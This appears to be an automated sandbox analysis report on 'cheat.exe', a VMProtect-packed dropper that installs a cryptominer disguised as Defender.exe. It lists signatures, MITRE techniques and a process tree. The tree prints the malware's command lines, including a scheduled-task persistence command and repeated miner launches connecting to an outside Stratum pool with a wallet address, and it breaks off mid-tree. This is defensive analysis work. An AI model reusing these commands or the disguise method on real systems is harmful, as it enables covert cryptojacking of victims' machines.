592ea2c548c74f9778a17ac78eba08eb7bfde214d690a7e593731fdbd604c877

Analysis

max time kernel
147s
max time network
160s
platform
windows7_x64
resource
win7v20210408
submitted
10-08-2021 11:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cheat.exe
Size

12.2MB
MD5

69c885675b1b98e2fbb3f0196a1df2d1
SHA1

533fa79f3b20623ae1c6de3fded5fb54b145af6a
SHA256

73bcd67ddecc7bf320a19bd5dbefdb36c097c3047959d67e0e3cc5e22f8b510b
SHA512

8b89b0a456e9d423c7e0d053772716f2e0e7877bff250e08f788d20b20fcb00bb6da831f59a781964ede23f9de74b5afcda0183d104fca523b392a89d063e44c

Score

9^/10

miner vmprotect

Malware Config

Signatures

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

Executes dropped EXE 28 IoCs

pid	Process
1776	d.exe
1468	Start.exe
1772	Defender.exe
1004	Defender.exe
900	Defender.exe
1712	Defender.exe
1876	Defender.exe
1808	Defender.exe
1932	Defender.exe
1884	Defender.exe
2044	Defender.exe
1672	Defender.exe
1824	Defender.exe
2040	Defender.exe
1936	Defender.exe
612	Defender.exe
764	Defender.exe
1640	Defender.exe
828	Defender.exe
1364	Defender.exe
1792	Defender.exe
1708	Defender.exe
2044	Defender.exe
1984	Defender.exe
1792	Defender.exe
652	Defender.exe
2044	Defender.exe
1940	Defender.exe

VMProtect packed file 64 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral9/files/0x00030000000130db-119.dat	vmprotect
behavioral9/files/0x00030000000130db-120.dat	vmprotect
behavioral9/files/0x00030000000130db-122.dat	vmprotect
behavioral9/files/0x00030000000130db-123.dat	vmprotect
behavioral9/memory/1772-124-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-129.dat	vmprotect
behavioral9/files/0x00030000000130db-130.dat	vmprotect
behavioral9/memory/1004-131-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-135.dat	vmprotect
behavioral9/files/0x00030000000130db-136.dat	vmprotect
behavioral9/memory/900-137-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-141.dat	vmprotect
behavioral9/files/0x00030000000130db-142.dat	vmprotect
behavioral9/memory/1712-143-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-147.dat	vmprotect
behavioral9/files/0x00030000000130db-148.dat	vmprotect
behavioral9/memory/1876-149-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-153.dat	vmprotect
behavioral9/files/0x00030000000130db-154.dat	vmprotect
behavioral9/memory/1808-155-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-159.dat	vmprotect
behavioral9/files/0x00030000000130db-160.dat	vmprotect
behavioral9/memory/1932-161-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-165.dat	vmprotect
behavioral9/files/0x00030000000130db-166.dat	vmprotect
behavioral9/memory/1884-167-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-171.dat	vmprotect
behavioral9/files/0x00030000000130db-172.dat	vmprotect
behavioral9/memory/2044-173-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-177.dat	vmprotect
behavioral9/files/0x00030000000130db-178.dat	vmprotect
behavioral9/memory/1672-179-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-183.dat	vmprotect
behavioral9/files/0x00030000000130db-184.dat	vmprotect
behavioral9/memory/1824-185-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-189.dat	vmprotect
behavioral9/files/0x00030000000130db-190.dat	vmprotect
behavioral9/memory/2040-191-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-195.dat	vmprotect
behavioral9/files/0x00030000000130db-196.dat	vmprotect
behavioral9/memory/1936-197-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-201.dat	vmprotect
behavioral9/files/0x00030000000130db-202.dat	vmprotect
behavioral9/memory/612-203-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-207.dat	vmprotect
behavioral9/files/0x00030000000130db-208.dat	vmprotect
behavioral9/memory/764-209-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-213.dat	vmprotect
behavioral9/files/0x00030000000130db-214.dat	vmprotect
behavioral9/memory/1640-215-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-219.dat	vmprotect
behavioral9/files/0x00030000000130db-220.dat	vmprotect
behavioral9/memory/828-221-0x0000000140000000-0x0000000141B19000-memory.dmp	vmprotect
behavioral9/files/0x00030000000130db-225.dat	vmprotect
behavioral9/files/0x00030000000130db-226.dat	vmprotect
behavioral9/files/0x00030000000130db-231.dat	vmprotect
behavioral9/files/0x00030000000130db-232.dat	vmprotect
behavioral9/files/0x00030000000130db-237.dat	vmprotect
behavioral9/files/0x00030000000130db-238.dat	vmprotect
behavioral9/files/0x00030000000130db-243.dat	vmprotect
behavioral9/files/0x00030000000130db-244.dat	vmprotect
behavioral9/files/0x00030000000130db-249.dat	vmprotect
behavioral9/files/0x00030000000130db-250.dat	vmprotect
behavioral9/files/0x00030000000130db-255.dat	vmprotect

Loads dropped DLL 30 IoCs

pid	Process
1240	WScript.exe
1652	cheat.exe
1652	cheat.exe
1168	WScript.exe
1964	Process not Found
1652	Process not Found
848	Process not Found
764	Process not Found
1364	Process not Found
296	Process not Found
1692	Process not Found
2016	Process not Found
1280	Process not Found
1712	Process not Found
1744	Process not Found
1696	Process not Found
1376	Process not Found
1940	Process not Found
1780	Process not Found
1708	Process not Found
1516	Process not Found
1256	Process not Found
764	Process not Found
1032	Process not Found
940	Process not Found
1940	Process not Found
640	Process not Found
1928	Process not Found
1764	Process not Found
1256	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs

pid	Process
1772	Defender.exe
1004	Defender.exe
900	Defender.exe
1712	Defender.exe
1876	Defender.exe
1808	Defender.exe
1932	Defender.exe
1884	Defender.exe
2044	Defender.exe
1672	Defender.exe
1824	Defender.exe
2040	Defender.exe
1936	Defender.exe
612	Defender.exe
764	Defender.exe
1640	Defender.exe
828	Defender.exe
1364	Defender.exe
1792	Defender.exe
1708	Defender.exe
2044	Defender.exe
1984	Defender.exe
1792	Defender.exe
652	Defender.exe
2044	Defender.exe
1940	Defender.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1676	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1780	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1772	Defender.exe
1292	powershell.exe
1292	powershell.exe
1004	Defender.exe
1292	powershell.exe
1292	powershell.exe
900	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1712	Defender.exe
1292	powershell.exe
1292	powershell.exe
1876	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1808	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1932	Defender.exe
1292	powershell.exe
1292	powershell.exe
1884	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
2044	Defender.exe
1292	powershell.exe
1292	powershell.exe
1672	Defender.exe
1292	powershell.exe
1292	powershell.exe
1824	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
2040	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1936	Defender.exe
1292	powershell.exe
1292	powershell.exe
612	Defender.exe
1292	powershell.exe
1292	powershell.exe
764	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
1640	Defender.exe
1292	powershell.exe
1292	powershell.exe
1292	powershell.exe
828	Defender.exe
1292	powershell.exe
1292	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1292	powershell.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1772	Defender.exe
1772	Defender.exe
1772	Defender.exe
1772	Defender.exe
1772	Defender.exe
1004	Defender.exe
1004	Defender.exe
1004	Defender.exe
1004	Defender.exe
1004	Defender.exe
900	Defender.exe
900	Defender.exe
900	Defender.exe
900	Defender.exe
900	Defender.exe
1712	Defender.exe
1712	Defender.exe
1712	Defender.exe
1712	Defender.exe
1712	Defender.exe
1876	Defender.exe
1876	Defender.exe
1876	Defender.exe
1876	Defender.exe
1876	Defender.exe
1808	Defender.exe
1808	Defender.exe
1808	Defender.exe
1808	Defender.exe
1808	Defender.exe
1932	Defender.exe
1932	Defender.exe
1932	Defender.exe
1932	Defender.exe
1932	Defender.exe
1884	Defender.exe
1884	Defender.exe
1884	Defender.exe
1884	Defender.exe
1884	Defender.exe
2044	Defender.exe
2044	Defender.exe
2044	Defender.exe
2044	Defender.exe
2044	Defender.exe
1672	Defender.exe
1672	Defender.exe
1672	Defender.exe
1672	Defender.exe
1672	Defender.exe
1824	Defender.exe
1824	Defender.exe
1824	Defender.exe
1824	Defender.exe
1824	Defender.exe
2040	Defender.exe
2040	Defender.exe
2040	Defender.exe
2040	Defender.exe
2040	Defender.exe
1936	Defender.exe
1936	Defender.exe
1936	Defender.exe
1936	Defender.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 1240	1652	cheat.exe	26
PID 1652 wrote to memory of 1240	1652	cheat.exe	26
PID 1652 wrote to memory of 1240	1652	cheat.exe	26
PID 1240 wrote to memory of 1776	1240	WScript.exe	27
PID 1240 wrote to memory of 1776	1240	WScript.exe	27
PID 1240 wrote to memory of 1776	1240	WScript.exe	27
PID 1240 wrote to memory of 1692	1240	WScript.exe	28
PID 1240 wrote to memory of 1692	1240	WScript.exe	28
PID 1240 wrote to memory of 1692	1240	WScript.exe	28
PID 1692 wrote to memory of 1676	1692	cmd.exe	30
PID 1692 wrote to memory of 1676	1692	cmd.exe	30
PID 1692 wrote to memory of 1676	1692	cmd.exe	30
PID 1652 wrote to memory of 1468	1652	cheat.exe	34
PID 1652 wrote to memory of 1468	1652	cheat.exe	34
PID 1652 wrote to memory of 1468	1652	cheat.exe	34
PID 1468 wrote to memory of 1488	1468	Start.exe	35
PID 1468 wrote to memory of 1488	1468	Start.exe	35
PID 1468 wrote to memory of 1488	1468	Start.exe	35
PID 1488 wrote to memory of 1780	1488	cmd.exe	37
PID 1488 wrote to memory of 1780	1488	cmd.exe	37
PID 1488 wrote to memory of 1780	1488	cmd.exe	37
PID 1488 wrote to memory of 1292	1488	cmd.exe	38
PID 1488 wrote to memory of 1292	1488	cmd.exe	38
PID 1488 wrote to memory of 1292	1488	cmd.exe	38
PID 1292 wrote to memory of 848	1292	powershell.exe	39
PID 1292 wrote to memory of 848	1292	powershell.exe	39
PID 1292 wrote to memory of 848	1292	powershell.exe	39
PID 848 wrote to memory of 1340	848	csc.exe	40
PID 848 wrote to memory of 1340	848	csc.exe	40
PID 848 wrote to memory of 1340	848	csc.exe	40
PID 1292 wrote to memory of 1168	1292	powershell.exe	41
PID 1292 wrote to memory of 1168	1292	powershell.exe	41
PID 1292 wrote to memory of 1168	1292	powershell.exe	41
PID 1168 wrote to memory of 1772	1168	WScript.exe	42
PID 1168 wrote to memory of 1772	1168	WScript.exe	42
PID 1168 wrote to memory of 1772	1168	WScript.exe	42
PID 1292 wrote to memory of 1596	1292	powershell.exe	44
PID 1292 wrote to memory of 1596	1292	powershell.exe	44
PID 1292 wrote to memory of 1596	1292	powershell.exe	44
PID 1596 wrote to memory of 1004	1596	WScript.exe	45
PID 1596 wrote to memory of 1004	1596	WScript.exe	45
PID 1596 wrote to memory of 1004	1596	WScript.exe	45
PID 1292 wrote to memory of 1136	1292	powershell.exe	47
PID 1292 wrote to memory of 1136	1292	powershell.exe	47
PID 1292 wrote to memory of 1136	1292	powershell.exe	47
PID 1136 wrote to memory of 900	1136	WScript.exe	48
PID 1136 wrote to memory of 900	1136	WScript.exe	48
PID 1136 wrote to memory of 900	1136	WScript.exe	48
PID 1292 wrote to memory of 960	1292	powershell.exe	50
PID 1292 wrote to memory of 960	1292	powershell.exe	50
PID 1292 wrote to memory of 960	1292	powershell.exe	50
PID 960 wrote to memory of 1712	960	WScript.exe	51
PID 960 wrote to memory of 1712	960	WScript.exe	51
PID 960 wrote to memory of 1712	960	WScript.exe	51
PID 1292 wrote to memory of 1840	1292	powershell.exe	53
PID 1292 wrote to memory of 1840	1292	powershell.exe	53
PID 1292 wrote to memory of 1840	1292	powershell.exe	53
PID 1840 wrote to memory of 1876	1840	WScript.exe	54
PID 1840 wrote to memory of 1876	1840	WScript.exe	54
PID 1840 wrote to memory of 1876	1840	WScript.exe	54
PID 1292 wrote to memory of 2004	1292	powershell.exe	56
PID 1292 wrote to memory of 2004	1292	powershell.exe	56
PID 1292 wrote to memory of 2004	1292	powershell.exe	56
PID 2004 wrote to memory of 1808	2004	WScript.exe	57

C:\Users\Admin\AppData\Local\Temp\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\cheat.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\d.vbs"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\ProgramData\Windows\d.exe
    "C:\ProgramData\Windows\d.exe" 61 C:\ProgramData\Windows\d.bat
    3⤵
    - Executes dropped EXE
    PID:1776
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\ProgramData\Windows\t.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1692
  - - C:\Windows\system32\schtasks.exe
      SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender" /TR "C:\ProgramData\Windows\Start.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1676
- C:\ProgramData\Windows\Start.exe
  C:\ProgramData\Windows\Start.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FB02.tmp\FB03.tmp\FB04.bat C:\ProgramData\Windows\Start.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1488
  - - C:\Windows\system32\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:1780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -executionpolicy Unrestricted C:\ProgramData\Windows\timeout.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1292
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f3cy3shz\f3cy3shz.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:848
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES30C1.tmp" "c:\Users\Admin\AppData\Local\Temp\f3cy3shz\CSC7E46F019DC84478E9E809C76E29291F5.TMP"
        6⤵
        
        PID:1340
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1168
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1772
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1596
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1004
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1136
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:900
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:960
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1712
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1840
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1876
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2004
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1808
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1460
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1932
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1632
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1884
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1928
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1600
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1672
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1832
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1824
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1060
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2040
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1808
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1936
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:936
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:612
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1652
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:764
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1696
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1640
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1840
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:828
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:740
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1364
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1800
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1792
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1684
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1708
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1952
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2044
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1876
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1984
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1864
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1792
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:432
      - C:\ProgramData\Windows\Defender.exe
        
        "C:\ProgramData\Windows\Defender.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 60 -u RNqes7FtprvyQNaFamUfShw19BdFUjbJAt
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:652
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\p.vbs"
        5⤵
        
        PID:1884
      - C:\ProgramData\Windows\Defender.exe
        
